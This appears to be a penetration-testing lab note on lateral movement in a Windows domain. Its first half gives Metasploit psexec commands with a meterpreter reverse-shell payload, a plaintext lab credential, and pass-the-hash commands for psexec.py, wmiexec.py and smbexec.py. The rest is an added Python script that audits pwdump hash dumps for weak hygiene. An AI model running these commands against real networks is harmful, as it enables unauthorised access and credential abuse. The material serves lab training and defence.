- Do it with the cracked password (LLMNR and Cracking captured Hashes)

Metasploit:
search psexec
use 4 #exploit/windows/smb/psexec (the index comes from the search output)
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.138
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
options #to review everything
show targets
set target 1 #not needed, just as a concept

psexec.py:
psexec.py MARVEL/fcastle:'Password1'@192.168.218.138
OR
psexec.py MARVEL/fcastle:@192.168.218.139
#and enter the password when prompted

- Do it with a hash (SMB Relay Attacks (NTLM))

psexec.py:
psexec.py administrator@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Metasploit:
set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Hash explained:
Hash: the whole LM:NT hash is needed for relay or passing the hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
LM: aad3b435b51404eeaad3b435b51404ee
NT: 7facdc498ed1680c4fd1448319a8c04f (only this portion is needed for cracking)

If psexec is getting blocked, you can use (-hashes takes the full LM:NT pair, as above):
wmiexec.py administrator@192.168.218.138 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
OR
smbexec.py administrator@192.168.218.138 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
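To make the "Hash explained" section concrete from the defensive side, here is an added example (not part of the original notes) that parses pwdump-format lines like the Administrator line above and audits them for the things a blue team cares about: LM hashes still being stored, blank passwords, and the same NT hash shared across accounts. The sample dump is constructed; only the Administrator line reuses the hash values from the page.

```python
"""Parse pwdump-style lines (user:RID:LM:NT:::) and audit them for weak hash hygiene."""
from collections import defaultdict
from typing import Dict, List, Optional

# LM hash of the empty string: what Windows stores when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump; the Administrator line is the one shown in the notes,
# the other two lines (and svc_backup's LM value) are made up for the example.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:0123456789abcdef0123456789abcdef:7facdc498ed1680c4fd1448319a8c04f:::
"""


def parse_pwdump_line(line: str) -> Optional[Dict[str, object]]:
    """Split one 'user:rid:lm:nt:::' line into fields; return None if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
        return None
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}


def audit_dump(text: str) -> List[str]:
    """Return human-readable findings for a whole dump, in order of discovery."""
    findings: List[str] = []
    users_by_nt: Dict[str, List[str]] = defaultdict(list)
    for line in text.splitlines():
        entry = parse_pwdump_line(line)
        if entry is None:
            continue  # skip blank or malformed lines rather than failing
        user = str(entry["user"])
        if entry["lm"] != EMPTY_LM:
            findings.append(f"{user}: LM hash stored (LM hashing still enabled)")
        if entry["nt"] == EMPTY_NT:
            findings.append(f"{user}: blank password")
        users_by_nt[str(entry["nt"])].append(user)
    # Identical NT hashes mean identical passwords (no salt in NTLM), so one
    # cracked or passed hash unlocks every account in the group.
    for nt, users in users_by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append(f"shared password between {', '.join(users)}")
    return findings


if __name__ == "__main__":
    for finding in audit_dump(SAMPLE_DUMP):
        print(finding)
```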